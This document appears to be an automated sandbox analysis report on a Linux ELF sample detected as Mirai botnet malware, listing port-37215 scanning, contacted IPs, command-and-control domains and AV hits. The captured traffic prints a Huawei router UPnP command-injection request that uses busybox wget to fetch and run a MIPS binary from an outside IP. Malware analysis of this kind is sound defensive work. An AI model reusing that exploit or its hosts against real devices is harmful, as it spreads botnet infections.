Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56818 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 56818
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56786 -> 37215

ELF contains segments with high entropy indicating compressed/encrypted content

Source: GZBCPDzO6n.elf

Submission file: segment LOAD with 7.9775 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/GZBCPDzO6n.elf (PID: 5430)

Queries kernel information via 'uname':

Jump to behavior

Source: GZBCPDzO6n.elf, 5430.1.00005598a4ca5000.00005598a4f14000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: GZBCPDzO6n.elf, 5430.1.00007ffcc31bf000.00007ffcc31e0000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/GZBCPDzO6n.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/GZBCPDzO6n.elf
Source: GZBCPDzO6n.elf, 5430.1.00005598a4ca5000.00005598a4f14000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: GZBCPDzO6n.elf, 5430.1.00007ffcc31bf000.00007ffcc31e0000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp, type: MEMORY

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
156.171.22.88	unknown	Egypt	36992	ETISALAT-MISREG	false
197.32.217.143	unknown	Egypt	8452	TE-ASTE-ASEG	false
156.82.62.169	unknown	United States	393649	BOOZ-AS2US	false
156.206.4.161	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.179.230.34	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
197.131.5.121	unknown	Morocco	6713	IAM-ASMA	false
156.72.176.95	unknown	United States	12122	UNASSIGNED	false
156.242.218.25	unknown	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
197.254.107.59	unknown	Kenya	15808	ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKE	false
197.113.54.107	unknown	Algeria	36947	ALGTEL-ASDZ	false
156.99.254.154	unknown	United States	1998	STATE-OF-MNUS	false
197.232.116.137	unknown	Kenya	36866	JTLKE	false
197.89.135.80	unknown	South Africa	10474	OPTINETZA	false
197.0.117.131	unknown	Tunisia	37705	TOPNETTN	false
156.211.246.177	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.4.200.42	unknown	Tunisia	5438	ATI-TN	false
197.254.119.43	unknown	Kenya	15808	ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKE	false
156.144.159.197	unknown	United States	3743	ARCEL-2US	false
197.66.218.21	unknown	South Africa	16637	MTNNS-ASZA	false
156.216.55.92	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.39.165.47	unknown	Egypt	8452	TE-ASTE-ASEG	false
156.83.88.191	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
156.80.56.38	unknown	United States	393649	BOOZ-AS2US	false
197.2.84.161	unknown	Tunisia	37705	TOPNETTN	false
156.152.174.186	unknown	United States	13979	ATT-IPFRUS	false
197.220.166.138	unknown	Ghana	37341	GLOMOBILEGH	false
197.253.0.244	unknown	Nigeria	37282	MAINONENG	false
197.15.157.5	unknown	Tunisia	37671	GLOBALNET-ASTN	false
197.222.170.122	unknown	Egypt	37069	MOBINILEG	false
197.109.158.34	unknown	South Africa	37168	CELL-CZA	false
197.167.221.0	unknown	Egypt	24863	LINKdotNET-ASEG	false
197.82.136.104	unknown	South Africa	10474	OPTINETZA	false
197.234.120.183	unknown	Namibia	33763	Paratus-TelecomNA	false
156.118.124.12	unknown	France	59863	NORSKREGNESENTRALNO	false
197.221.180.230	unknown	South Africa	37356	O-TelZA	false
156.183.29.37	unknown	Egypt	36992	ETISALAT-MISREG	false
197.233.253.24	unknown	Namibia	36999	TELECOM-NAMIBIANA	false
156.85.239.77	unknown	United States	10695	WAL-MARTUS	false
156.183.30.30	unknown	Egypt	36992	ETISALAT-MISREG	false
156.144.112.191	unknown	United States	3743	ARCEL-2US	false
197.92.3.145	unknown	South Africa	10474	OPTINETZA	false
156.93.220.209	unknown	United States	46313	WAL-MART4US	false
197.87.110.17	unknown	South Africa	10474	OPTINETZA	false
197.245.8.138	unknown	South Africa	11845	Vox-TelecomZA	false
156.158.248.199	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
156.96.98.143	unknown	United States	26484	IKGUL-26484US	false
197.227.254.233	unknown	Mauritius	23889	MauritiusTelecomMU	false
197.222.170.117	unknown	Egypt	37069	MOBINILEG	false
197.191.9.230	unknown	Ghana	37140	zain-asGH	false
156.94.122.167	unknown	United States	10695	WAL-MARTUS	false
156.30.114.141	unknown	United States	34542	SAFRANHE-ASFR	false
197.179.30.0	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
156.200.26.127	unknown	Egypt	8452	TE-ASTE-ASEG	false
156.197.222.99	unknown	Egypt	8452	TE-ASTE-ASEG	false
156.56.112.74	unknown	United States	87	INDIANA-ASUS	false
156.199.163.152	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.233.253.13	unknown	Namibia	36999	TELECOM-NAMIBIANA	false
197.159.165.42	unknown	Sao Tome and Principe	328191	CST-NET-ASST	false
197.193.219.72	unknown	Egypt	36992	ETISALAT-MISREG	false
156.184.158.81	unknown	Egypt	36992	ETISALAT-MISREG	false
156.7.85.67	unknown	United States	29975	VODACOM-ZA	false
156.175.119.35	unknown	Egypt	36992	ETISALAT-MISREG	false
156.228.75.59	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
197.17.197.217	unknown	Tunisia	37693	TUNISIANATN	false
156.55.76.80	unknown	United States	20746	ASN-IDCTNOOMINCIT	false
156.38.69.221	unknown	Togo	36924	GVA-CanalboxBJ	false
197.152.240.73	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
197.171.35.143	unknown	South Africa	37168	CELL-CZA	false
156.122.75.60	unknown	United States	393504	XNSTGCA	false
156.10.102.128	unknown	Finland	39098	BOF-ASFI	false
197.220.177.18	unknown	Ghana	37341	GLOMOBILEGH	false
156.173.241.2	unknown	Egypt	36992	ETISALAT-MISREG	false
156.20.8.13	unknown	United States	29975	VODACOM-ZA	false
197.204.9.234	unknown	Algeria	36947	ALGTEL-ASDZ	false
156.20.8.19	unknown	United States	29975	VODACOM-ZA	false
156.104.234.98	unknown	United States	393504	XNSTGCA	false
156.5.232.94	unknown	United States	29975	VODACOM-ZA	false
156.86.107.168	unknown	United States	10695	WAL-MARTUS	false
156.118.136.51	unknown	France	59863	NORSKREGNESENTRALNO	false
156.157.24.235	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
197.212.239.106	unknown	Zambia	37287	ZAIN-ZAMBIAZM	false
197.135.63.168	unknown	Egypt	24835	RAYA-ASEG	false
156.97.29.244	unknown	Chile	393504	XNSTGCA	false
197.55.34.213	unknown	Egypt	8452	TE-ASTE-ASEG	false
156.49.160.44	unknown	Sweden	29975	VODACOM-ZA	false
197.18.187.123	unknown	Tunisia	37693	TUNISIANATN	false
197.70.60.121	unknown	South Africa	16637	MTNNS-ASZA	false
156.33.207.26	unknown	United States	3495	SENATE-ASUS	false
156.145.226.15	unknown	United States	395139	NYP-INTERNETUS	false
197.24.198.109	unknown	Tunisia	37693	TUNISIANATN	false
156.68.15.208	unknown	United States	297	AS297US	false
156.58.240.209	unknown	Austria	199083	MP-ASAT	false
156.93.132.214	unknown	United States	10695	WAL-MARTUS	false
197.45.105.108	unknown	Egypt	8452	TE-ASTE-ASEG	false
197.248.91.254	unknown	Kenya	37061	SafaricomKE	false
197.236.72.121	unknown	South Africa	5713	SAIX-NETZA	false
197.194.23.193	unknown	Egypt	36992	ETISALAT-MISREG	false
156.49.159.69	unknown	Sweden	29975	VODACOM-ZA	false
197.205.103.242	unknown	Algeria	36947	ALGTEL-ASDZ	false
197.246.117.185	unknown	Egypt	20928	NOOR-ASEG	false

Contacted Domains

Name	IP	Active
secure-core-rebirthltd.su.& f#66a/PV!E((@@o	unknown	unknown
secure-core-rebirthltd.su.% f66a/PV!E(C1.=5Jj% fVVP.!a/EH:6@@F=54msecure-core-rebirthltdsu-% .<<PV!a/E(,@-!m._-!P[% f<<PV!a/.(7@3m._3P[3F% fI<<PV!	unknown	unknown
rebirth-network.su.J f,\FFa/PV!E8E(k[8;m._8;J fz66	unknown	unknown
secure-core-rebirthltd.su.% f<<PV!a/E(,@	unknown	unknown
rebirth-network.su.@ f`ZZPV!a/EL@@jn_3Dlg>P3yPOST /ctrlt/DeviceUpgrade_1 H.TP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Dig.st username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri=".ctrlt/DeviceUpgrade_1", response="3612f843a42db.8f48f59d2a3597e19c", algorithm="MD5", qop="auth", n.=00000001, cnonce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.x.lsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmln.:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mip.; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDown.oadURL></u:Upgrade></s:Body></s:Envelope>@ fTZZPV!a/ELC/@@tsL_/yPP.POST /ctrlt/DeviceU.grade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf.config", realm="HuaweiHomeGateway", nonce="88.45cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgr.de_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cno.ce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/".s:encodingStyle="http://schemas..mlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(.bin/busybox wget http://79.110.62.86/srep.mips;./bin/busybox chmod 777 * srep.mi.s; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s.Envelope>@ f<<PV!a/E(@@v.m._	unknown	unknown
sex.secure-cyber-security-rebirthltd.su	unknown	unknown
secure-core-rebirthltd.su.% f?66a/PV!E(/2.=5aM% fAVVP.!a/EH:.@@F=J54secure-core-rebirthltdsu-% .66a/PV!E(C1/=5Jj% fVVPV!a/EH:6.@F=54msecure-core-rebirthltdsu-.%	unknown	unknown
rebirth-network.su.E fe66a/PV!EH(@q-/_m./PE fe66a/PV!	unknown	unknown
secure-core-rebirthltd.su.% f>66a/PV!E(@7	unknown	unknown
rebirth-network.su.6 f66a/PV!E((@.y_m.zP6 fRRa/PV!	unknown	unknown
rebirth-network.su.; fkRRa/PV!ED:LJ0E(9R8z'?'m._'?'P[;	unknown	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: GZBCPDzO6n.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: GZBCPDzO6n.elf

ReversingLabs: Detection: 47%

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 156.254.79.98 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.195.138.230 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.73.198.184 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 197.53.1.101 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.73.143.221 ports 1,2,3,5,7,37215

Performs DNS queries with encoded ASCII data (may be used to data exfiltration)

Source: unknown

Queries the IP of a very long domain name

Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f?66a/PV!E(/2.=5aM% fAVVP.!a/EH:.@@F=J54secure-core-rebirthltdsu-% .66a/PV!E(C1/=5Jj% fVVPV!a/EH:6.@F=54msecure-core-rebirthltdsu-.%
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f66a/PV!E(C1.=5Jj% fVVP.!a/EH:6@@F=54msecure-core-rebirthltdsu-% .<<PV!a/E(,@-!m._-!P[% f<<PV!a/.(7@3m._3P[3F% fI<<PV!
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f<<PV!a/E(,@
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f>66a/PV!E(@7
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.& f#66a/PV!E((@@o
Source: unknown	DNS traffic detected: query: rebirth-network.su.6 f66a/PV!E((@.y_m.zP6 fRRa/PV!
Source: unknown	DNS traffic detected: query: rebirth-network.su.; fkRRa/PV!ED:LJ0E(9R8z'?'m._'?'P[;
Source: unknown	DNS traffic detected: query: rebirth-network.su.@ f`ZZPV!a/EL@@jn_3Dlg>P3yPOST /ctrlt/DeviceUpgrade_1 H.TP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Dig.st username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri=".ctrlt/DeviceUpgrade_1", response="3612f843a42db.8f48f59d2a3597e19c", algorithm="MD5", qop="auth", n.=00000001, cnonce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.x.lsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmln.:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mip.; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDown.oadURL></u:Upgrade></s:Body></s:Envelope>@ fTZZPV!a/ELC/@@tsL_/yPP.POST /ctrlt/DeviceU.grade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf.config", realm="HuaweiHomeGateway", nonce="88.45cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgr.de_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cno.ce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/".s:encodingStyle="http://schemas..mlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(.bin/busybox wget http://79.110.62.86/srep.mips;./bin/busybox chmod 777 * srep.mi.s; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s.Envelope>@ f<<PV!a/E(@@v.m._
Source: unknown	DNS traffic detected: query: rebirth-network.su.E fe66a/PV!EH(@q-/_m./PE fe66a/PV!
Source: unknown	DNS traffic detected: query: rebirth-network.su.J f,\FFa/PV!E8E(k[8;m._8;J fz66

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56818 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 56818
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56786 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.115.10.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.212.106.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.174.135.120:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.183.115.110:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.191.167:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.251.79.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.247.245.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.206.175.163:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.110.42.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.0.80.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.3.217.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.72.18.244:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.147.16.117:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.142.59.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.109.191.162:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.185.211.71:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.22.28.98:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.68.131.208:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.110.194.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.248.141.96:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.172.252.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.24.143.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.97.41.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.234.95.66:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.106.122.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.135.180.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.207.238.227:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.122.216.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.45.11.31:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.43.117.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.235.194.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.232.119.47:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.227.160.153:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.90.163.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.227.138.149:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.8.245.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.18.43.241:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.220.166.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.203.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.242.91.79:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.84.161.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.73.91.220:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.80.125.123:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.189.57.158:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.76.235.108:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.97.215.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.43.88.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.105.109.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.30.101.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.29.159.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.107.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.55.14.170:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.31.158.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.243.236.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.254.204.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.66.60.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.62.62.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.59.48.251:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.212.168.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.35.55.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.206.136.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.99.77.105:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.56.126.197:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.69.47.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.173.47.188:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.235.107.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.197.128.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.250.44.201:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.161.47.158:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.2.132.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.166.197.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.39.19.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.27.39.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.81.20.12:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.30.142.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.106.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.194.90.156:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.29.143.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.88.242.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.82.17.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.37.72.39:37215
